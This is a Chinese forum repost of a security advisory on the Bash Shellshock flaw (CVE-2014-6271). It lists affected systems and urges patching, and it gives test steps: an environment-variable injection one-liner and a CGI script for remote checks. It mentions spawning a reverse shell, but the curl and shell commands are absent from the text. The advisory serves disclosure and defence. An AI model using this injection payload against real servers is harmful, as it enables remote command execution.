本帖最后由 360媒体看台 于 2014-9-25 13:47 编辑
9月25日,国外曝出一个“毁灭级”的Bash漏洞,黑客可利用此漏洞远程执行任意命令,完全控制目标系统!
该漏洞编号为CVE-2014-6271,主要存在于bash 1.14 - 4.3版本中,受影响的系统包括:Red Hat企业Linux (versions 4-7) 、Fedora distribution、CentOS (versions 5-7)、Ubuntu 10.04 LTS,12.04LTS和14.04 LTS、Debian等。
经360安全中心分析验证,受此Bash漏洞影响最大的是网站和企业内网,以及一些路由器、VPN大型网站等网络设备。该漏洞暂未对安卓官方版本造成影响,但一些第三方Rom需要注意安全。
该漏洞可能被黑客制作成自动化攻击工具,从而针对网站、企业发动规模化攻击。由于漏洞攻击面广、影响范围大,其威胁丝毫不亚于OpenSSL心脏出血漏洞。
360安全中心已紧急发布“Bash”漏洞测试方法,同时提醒广大网站和企业及时更新服务器安全补丁,避免造成重大危险。
“Bash”漏洞测试方法
1)、本地测试 env x='() { :;}; echo vulnerable'bash -c "echo this is a test"
2)、远程测试 首先用BASH写一个CGI root@kali:/usr/lib/cgi-bin# cat bug.sh #!/bin/bash echo "Content-type: text/html" echo "" echo '<html>' echo '<head>' echo '<metahttp-equiv="Content-Type" content="text/html;charset=UTF-8">' echo '<title>PoC</title>' echo '</head>' echo '<body>' echo '<pre>' /usr/bin/env echo '</pre>' echo '</body>' echo '</html>' exit 0 放到/usr/lib/cgi-bin里,然后用curl访问
能打印出环境变量了。说明能够正常访问了。下面反弹一个SHELL
访问看结果:
|
评论
直达楼层